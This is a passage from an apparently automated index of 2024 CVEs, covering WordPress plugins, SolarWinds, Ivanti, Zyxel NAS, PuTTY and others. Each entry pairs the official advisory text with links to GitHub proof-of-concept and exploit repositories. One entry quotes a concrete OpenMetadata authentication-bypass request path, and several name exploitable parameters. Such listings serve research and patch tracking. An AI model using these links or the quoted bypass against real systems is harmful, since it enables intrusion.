- [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE)
- [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE)
- [ThatNotEasy/CVE-2024-27956](https://github.com/ThatNotEasy/CVE-2024-27956)
- [CERTologists/EXPLOITING-CVE-2024-27956](https://github.com/CERTologists/EXPLOITING-CVE-2024-27956)
### CVE-2024-27971 (2024-05-17)
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion.This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10.
- [truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note)
### CVE-2024-27972 (2024-04-03)
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection.This issue affects WP Fusion Lite: from n/a through 3.41.24.\n\n
- [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc)
### CVE-2024-27983 (2024-04-09)
An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.
- [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2)
### CVE-2024-28000 (2024-08-21)
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
- [Alucard0x1/CVE-2024-28000](https://github.com/Alucard0x1/CVE-2024-28000)
- [ebrasha/CVE-2024-28000](https://github.com/ebrasha/CVE-2024-28000)
- [arch1m3d/CVE-2024-28000](https://github.com/arch1m3d/CVE-2024-28000)
- [SSSSuperX/CVE-2024-28000](https://github.com/SSSSuperX/CVE-2024-28000)
- [JohnDoeAnonITA/CVE-2024-28000](https://github.com/JohnDoeAnonITA/CVE-2024-28000)
### CVE-2024-28085 (2024-03-27)
wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.
- [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085)
- [oditynet/sleepall](https://github.com/oditynet/sleepall)
### CVE-2024-28088 (2024-03-03)
LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)
- [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc)
### CVE-2024-28116 (2024-03-21)
Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.
- [akabe1/Graver](https://github.com/akabe1/Graver)
- [gunzf0x/Grav-CMS-RCE-Authenticated](https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated)
- [geniuszlyy/GenGravSSTIExploit](https://github.com/geniuszlyy/GenGravSSTIExploit)
### CVE-2024-28247 (2024-03-27)
The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pihole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs from behind, reading files is done as a privileged user.If the URL that is in the list of "Adslists" begins with "file*" it is understood that it is updating from a local file, on the other hand if it does not begin with "file*" depending on the state of the response it does one thing or another. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed by 5.18.
- [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read)
### CVE-2024-28255 (2024-03-15)
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.
- [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255)
### CVE-2024-28397 (2024-06-20)
An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
- [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape)
- [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape)
### CVE-2024-28515 (2024-04-03)
Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component.
- [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515)
### CVE-2024-28589 (2024-04-03)
An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before, allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure DLL loading from a world-writable directory during service initialization.
- [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589)
### CVE-2024-28715 (2024-03-19)
Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.
- [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715)
### CVE-2024-28741 (2024-04-06)
Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component.
- [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc)
### CVE-2024-28757 (2024-03-10)
libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).
- [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757)
- [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757)
- [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757)
### CVE-2024-28987 (2024-08-21)
The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
- [fa-rrel/CVE-2024-28987-POC](https://github.com/fa-rrel/CVE-2024-28987-POC)
- [horizon3ai/CVE-2024-28987](https://github.com/horizon3ai/CVE-2024-28987)
- [PlayerFridei/CVE-2024-28987](https://github.com/PlayerFridei/CVE-2024-28987)
- [HazeLook/CVE-2024-28987](https://github.com/HazeLook/CVE-2024-28987)
- [Jaden1419/CVE-2024-28987](https://github.com/Jaden1419/CVE-2024-28987)
- [hatvix1/CVE-2024-28987](https://github.com/hatvix1/CVE-2024-28987)
### CVE-2024-28995 (2024-06-06)
\n\n\n\n\n\n\n\n\n\n\n\nSolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine. \n\n\n\n\n\n\n\n
- [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995)
- [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995)
- [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template)
- [0xc4t/CVE-2024-28995](https://github.com/0xc4t/CVE-2024-28995)
- [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995)
- [muhammetali20/CVE-2024-28995](https://github.com/muhammetali20/CVE-2024-28995)
- [Praison001/CVE-2024-28995-SolarWinds-Serv-U](https://github.com/Praison001/CVE-2024-28995-SolarWinds-Serv-U)
- [Stuub/CVE-2024-28995](https://github.com/Stuub/CVE-2024-28995)
- [gotr00t0day/CVE-2024-28995](https://github.com/gotr00t0day/CVE-2024-28995)
### CVE-2024-28999 (2024-06-04)
The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console.
- [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999)
### CVE-2024-29050 (2024-04-09)
Windows Cryptographic Services Remote Code Execution Vulnerability
- [Akrachli/CVE-2024-29050](https://github.com/Akrachli/CVE-2024-29050)
### CVE-2024-29059 (2024-03-22)
.NET Framework Information Disclosure Vulnerability
- [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak)
### CVE-2024-29269 (2024-04-10)
An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.
- [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269)
- [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269)
- [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269)
- [dream434/CVE-2024-29269](https://github.com/dream434/CVE-2024-29269)
- [K3ysTr0K3R/CVE-2024-29269-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-29269-EXPLOIT)
- [hack-with-rohit/CVE-2024-29269-RCE](https://github.com/hack-with-rohit/CVE-2024-29269-RCE)
- [Quantum-Hacker/CVE-2024-29269](https://github.com/Quantum-Hacker/CVE-2024-29269)
### CVE-2024-29272 (2024-03-22)
Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
- [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272)
### CVE-2024-29275 (2024-03-22)
SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php.
- [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template)
### CVE-2024-29278 (2024-03-30)
funboot v1.1 is vulnerable to Cross Site Scripting (XSS) via the title field in "create a message ."
- [QDming/cve](https://github.com/QDming/cve)
### CVE-2024-29296 (2024-04-10)
A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not.
- [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296)
- [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC)
### CVE-2024-29375 (2024-04-04)
CSV Injection vulnerability in Addactis IBNRS v.3.10.3.107 allows a remote attacker to execute arbitrary code via a crafted .ibnrs file to the Project Description, Identifiers, Custom Triangle Name (inside Input Triangles) and Yield Curve Name parameters.
- [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375)
### CVE-2024-29399 (2024-04-11)
An issue was discovered in GNU Savane v.3.13 and before, allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component.
- [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399)
### CVE-2024-29415 (-)
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
- [felipecruz91/node-ip-vex](https://github.com/felipecruz91/node-ip-vex)
### CVE-2024-29510 (2024-07-03)
Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device.
- [swsmith2391/CVE-2024-29510](https://github.com/swsmith2391/CVE-2024-29510)
### CVE-2024-29824 (2024-05-31)
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
- [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824)
- [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824)
### CVE-2024-29847 (2024-09-12)
Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution.
- [sinsinology/CVE-2024-29847](https://github.com/sinsinology/CVE-2024-29847)
### CVE-2024-29849 (2024-05-22)
Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface.
- [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849)
### CVE-2024-29855 (2024-06-11)
Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator
- [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855)
### CVE-2024-29863 (2024-04-05)
A race condition in the installer executable in Qlik Qlikview before versions May 2022 SR3 (12.70.20300) and May 2023 SR2 (12,80.20200) may allow an existing lower privileged user to cause code to be executed in the context of a Windows Administrator.
- [pawlokk/qlikview-poc-CVE-2024-29863](https://github.com/pawlokk/qlikview-poc-CVE-2024-29863)
### CVE-2024-29868 (2024-06-24)
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.\nThis allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.\nThis issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.\n\nUsers are recommended to upgrade to version 0.95.0, which fixes the issue.\n\n
- [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868)
### CVE-2024-29895 (2024-05-13)
Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.
- [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC)
- [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895)
- [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py)
- [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895)
### CVE-2024-29943 (2024-03-22)
An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1.
- [bjrjk/CVE-2024-29943](https://github.com/bjrjk/CVE-2024-29943)
### CVE-2024-29972 (2024-06-04)
** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
- [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972)
- [Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc](https://github.com/Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc)
### CVE-2024-29973 (2024-06-04)
** UNSUPPORTED WHEN ASSIGNED **\nThe command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
- [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973)
- [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973)
- [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973)
- [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973)
- [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973)
- [skyrowalker/CVE-2024-29973](https://github.com/skyrowalker/CVE-2024-29973)
### CVE-2024-29988 (2024-04-09)
SmartScreen Prompt Security Feature Bypass Vulnerability
- [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit)
### CVE-2024-30043 (2024-05-14)
Microsoft SharePoint Server Information Disclosure Vulnerability
- [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE)
### CVE-2024-30051 (2024-05-14)
Windows DWM Core Library Elevation of Privilege Vulnerability
- [fortra/CVE-2024-30051](https://github.com/fortra/CVE-2024-30051)
### CVE-2024-30052 (2024-06-11)
Visual Studio Remote Code Execution Vulnerability
- [ynwarcs/CVE-2024-30052](https://github.com/ynwarcs/CVE-2024-30052)
### CVE-2024-30056 (2024-05-25)
Microsoft Edge (Chromium-based) Information Disclosure Vulnerability
- [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure)
### CVE-2024-30088 (2024-06-11)
Windows Kernel Elevation of Privilege Vulnerability
- [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088)
- [NextGenPentesters/CVE-2024-30088-](https://github.com/NextGenPentesters/CVE-2024-30088-)
- [Zombie-Kaiser/CVE-2024-30088-Windows-poc](https://github.com/Zombie-Kaiser/CVE-2024-30088-Windows-poc)
- [exploits-forsale/collateral-damage](https://github.com/exploits-forsale/collateral-damage)
- [Admin9961/CVE-2024-30088](https://github.com/Admin9961/CVE-2024-30088)
- [Justintroup85/exploits-forsale-collateral-damage](https://github.com/Justintroup85/exploits-forsale-collateral-damage)
### CVE-2024-30090 (2024-06-11)
Microsoft Streaming Service Elevation of Privilege Vulnerability
- [Dor00tkit/CVE-2024-30090](https://github.com/Dor00tkit/CVE-2024-30090)
### CVE-2024-30212 (2024-05-28)
If a SCSI READ(10) command is initiated via USB using the largest LBA \n(0xFFFFFFFF) with it's default block size of 512 and a count of 1,\n\nthe first 512 byte of the 0x80000000 memory area is returned to the \nuser. If the block count is increased, the full RAM can be exposed.\n\nThe same method works to write to this memory area. If RAM contains \npointers, those can be - depending on the application - overwritten to\n\nreturn data from any other offset including Progam and Boot Flash.
- [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak)
### CVE-2024-30255 (2024-04-04)
Envoy is a cloud-native, open source edge and service proxy. The HTTP/2 protocol stack in Envoy versions prior to 1.29.3, 1.28.2, 1.27.4, and 1.26.8 are vulnerable to CPU exhaustion due to flood of CONTINUATION frames. Envoy's HTTP/2 codec allows the client to send an unlimited number of CONTINUATION frames even after exceeding Envoy's header map limits. This allows an attacker to send a sequence of CONTINUATION frames without the END_HEADERS bit set causing CPU utilization, consuming approximately 1 core per 300Mbit/s of traffic and culminating in denial of service through CPU exhaustion. Users should upgrade to version 1.29.3, 1.28.2, 1.27.4, or 1.26.8 to mitigate the effects of the CONTINUATION flood. As a workaround, disable HTTP/2 protocol for downstream connections.
- [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC)
### CVE-2024-30270 (2024-04-04)
mailcow: dockerized is an open source groupware/email suite based on docker. A security vulnerability has been identified in mailcow affecting versions prior to 2024-04. This vulnerability is a combination of path traversal and arbitrary code execution, specifically targeting the `rspamd_maps()` function. It allows authenticated admin users to overwrite any file writable by the www-data user by exploiting improper path validation. The exploit chain can lead to the execution of arbitrary commands on the server. Version 2024-04 contains a patch for the issue.
- [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC)
### CVE-2024-30491 (2024-03-29)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.8.\n\n
- [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc)
### CVE-2024-30614 (2024-04-12)
An issue in Ametys CMS v4.5.0 and before allows attackers to obtain sensitive information via exposed resources to the error scope.
- [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614)
### CVE-2024-30656 (2024-04-15)
An issue in Fireboltt Dream Wristphone BSW202_FB_AAC_v2.0_20240110-20240110-1956 allows attackers to cause a Denial of Service (DoS) via a crafted deauth frame.
- [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability)
### CVE-2024-30850 (2024-04-12)
An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go
- [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc)
### CVE-2024-30851 (2024-05-03)
Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component.
- [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc)
### CVE-2024-30875
- [Ant1sec-ops/CVE-2024-30875](https://github.com/Ant1sec-ops/CVE-2024-30875)
### CVE-2024-30896
- [XenoM0rph97/CVE-2024-30896](https://github.com/XenoM0rph97/CVE-2024-30896)
### CVE-2024-30956
- [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956)
### CVE-2024-30973 (2024-05-06)
An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbtirary code and obtain sensitive information via crafted POST request to /boaform/getASPdata/formFirewall, /boaform/getASPdata/formAcc.
- [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973)
### CVE-2024-30998 (2024-04-03)
SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component.
- [efekaanakkar/CVE-2024-30998](https://github.com/efekaanakkar/CVE-2024-30998)
### CVE-2024-31210 (2024-04-04)
WordPress is an open publishing platform for the Web. It's possible for a file of a type other than a zip file to be submitted as a new plugin by an administrative user on the Plugins -> Add New -> Upload Plugin screen in WordPress. If FTP credentials are requested for installation (in order to move the file into place outside of the `uploads` directory) then the uploaded file remains temporary available in the Media Library despite it not being allowed. If the `DISALLOW_FILE_EDIT` constant is set to `true` on the site _and_ FTP credentials are required when uploading a new theme or plugin, then this technically allows an RCE when the user would otherwise have no means of executing arbitrary PHP code. This issue _only_ affects Administrator level users on single site installations, and Super Admin level users on Multisite installations where it's otherwise expected that the user does not have permission to upload or execute arbitrary PHP code. Lower level users are not affected. Sites where the `DISALLOW_FILE_MODS` constant is set to `true` are not affected. Sites where an administrative user either does not need to enter FTP credentials or they have access to the valid FTP credentials, are not affected. The issue was fixed in WordPress 6.4.3 on January 30, 2024 and backported to versions 6.3.3, 6.2.4, 6.1.5, 6.0.7, 5.9.9, 5.8.9, 5.7.11, 5.6.13, 5.5.14, 5.4.15, 5.3.17, 5.2.20, 5.1.18, 5.0.21, 4.9.25, 2.8.24, 4.7.28, 4.6.28, 4.5.31, 4.4.32, 4.3.33, 4.2.37, and 4.1.40. A workaround is available. If the `DISALLOW_FILE_MODS` constant is defined as `true` then it will not be possible for any user to upload a plugin and therefore this issue will not be exploitable.\n
- [Abo5/CVE-2024-31210](https://github.com/Abo5/CVE-2024-31210)
### CVE-2024-31211 (2024-04-04)
WordPress is an open publishing platform for the Web. Unserialization of instances of the `WP_HTML_Token` class allows for code execution via its `__destruct()` magic method. This issue was fixed in WordPress 6.4.2 on December 6th, 2023. Versions prior to 6.4.0 are not affected.
- [Abdurahmon3236/-CVE-2024-31211](https://github.com/Abdurahmon3236/-CVE-2024-31211)
### CVE-2024-31319 (2024-07-09)
In updateNotificationChannelFromPrivilegedListener of NotificationManagerService.java, there is a possible cross-user data leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039](https://github.com/23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039)
### CVE-2024-31351 (2024-05-17)
Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6.
- [KTN1990/CVE-2024-31351_wordpress_exploit](https://github.com/KTN1990/CVE-2024-31351_wordpress_exploit)
### CVE-2024-31497 (2024-04-15)
In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.
- [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497)
- [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497)
- [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC)
### CVE-2024-31666 (2024-04-22)
An issue in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via a crafted script to the edit_addon_post.php component.
- [hapa3/CVE-2024-31666](https://github.com/hapa3/CVE-2024-31666)
### CVE-2024-31719
- [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability)
### CVE-2024-31771 (-)
Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file
- [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771)
### CVE-2024-31777 (2024-06-13)
File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint.
- [FreySolarEye/Exploit-CVE-2024-31777](https://github.com/FreySolarEye/Exploit-CVE-2024-31777)
### CVE-2024-31819 (2024-04-10)
An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.
- [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819)
- [dream434/CVE-2024-31819](https://github.com/dream434/CVE-2024-31819)
### CVE-2024-31835
- [paragbagul111/CVE-2024-31835](https://github.com/paragbagul111/CVE-2024-31835)
### CVE-2024-31848 (2024-04-05)
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
- [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC)
### CVE-2024-31974 (-)
The com.solarized.firedown (aka Solarized FireDown Browser & Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions).
- [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown)
### CVE-2024-31982 (2024-04-10)
XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.
